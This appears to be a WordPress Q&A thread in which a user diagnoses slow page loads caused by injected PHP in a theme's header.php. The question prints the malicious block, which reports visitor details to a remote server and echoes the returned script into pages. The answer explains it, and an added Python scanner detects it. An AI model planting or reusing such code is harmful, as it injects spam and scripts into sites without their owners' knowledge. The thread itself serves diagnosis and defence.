
templates - What is this code trying to do? It was the cause of my 20s TTFB


I was troubleshooting a 20-30s TTFB for a WordPress Theme with the help of the fabulous Query Monitor.

I was able to narrow down the cause to this code:

#e0e950#
error_reporting(0); @ini_set('display_errors',0); $wp_s15 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_s15) && !preg_match ('/bot/i', $wp_s15))){
$wp_s0915="http://"."https"."http"."/"."http/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_s15);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_s0915); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_15s = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_15s = @file_get_contents($wp_s0915);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_15s=@stream_get_contents(@fopen($wp_s0915, "r"));}}
if (substr($wp_15s,1,3) === 'scr'){ echo $wp_15s; }
#/e0e950#

The cause of the TTFB now becomes obvious thanks to the 20 second timeout value of the curl request. But why does this code even exist in a template header.php and what on earth is it doing?

Asked Jan 30, 2019 at 13:09 by kwacky1

1 Answer

Most probably it's some kind of malicious code.

What it does is:

  1. Disable error reporting
  2. Check the available methods of getting contents from a remote server
  3. Send a request to a remote server
  4. Display the result of that request on your site

So it's some kind of spammy SEO links or something like that.

And no, your site shouldn't have such code on it and if it does - most probably it's a result of malware infection.
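A defensive check built from the behaviour listed in the answer, as an added example that is not part of the original question or answer: a Python scanner that flags a PHP file combining a remote fetch, an echo of a variable and at least one of the other traits seen in the snippet. The scoring rule, function names and sample files are assumptions constructed for illustration.

```python
import re

# Heuristics taken from the snippet in the question; the scoring rule is an assumption.
MARKER = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.S)  # e.g. #e0e950# ... #/e0e950#
INDICATORS = {
    "suppresses_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "reads_user_agent": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]"),
    "sends_visitor_ip": re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]"),
    "remote_fetch": re.compile(r"\b(?:curl_exec|file_get_contents|stream_get_contents)\s*\("),
    "echoes_variable": re.compile(r"\becho\s+\$\w+"),
}

def scan_php(source):
    """Return a finding dict for one PHP file's text, or None if it looks clean."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    # Fetch-then-echo is the core behaviour; require one more trait to cut noise.
    if not ({"remote_fetch", "echoes_variable"} <= set(hits) and len(hits) >= 3):
        return None
    marker = MARKER.search(source)
    # Point at the marker comment if present, otherwise at the first fetch call.
    anchor = marker or INDICATORS["remote_fetch"].search(source)
    return {
        "marker": marker.group(1) if marker else None,
        "line": source.count("\n", 0, anchor.start()) + 1,  # 1-based line number
        "indicators": hits,
    }

# Constructed samples (not real files); placeholder.invalid stands in for the remote host.
INFECTED = """<?php
#e0e950#
error_reporting(0); $ua = @$_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Gecko|MSIE/i', $ua) && !preg_match('/bot/i', $ua)) {
  $u = "http://placeholder.invalid/?ip=".$_SERVER['REMOTE_ADDR']."&ua=".urlencode($ua);
  $r = @file_get_contents($u);
}
if (substr($r,1,3) === 'scr') { echo $r; }
#/e0e950#
?><html>
"""
CLEAN = """<?php $title = get_bloginfo('name'); ?>
<title><?php echo $title; ?></title>
"""

if __name__ == "__main__":
    for name, text in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, scan_php(text))
```

A hit is a prompt for manual review of the file, and the injected block is only the symptom: the write access that placed it in header.php still has to be found and closed.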
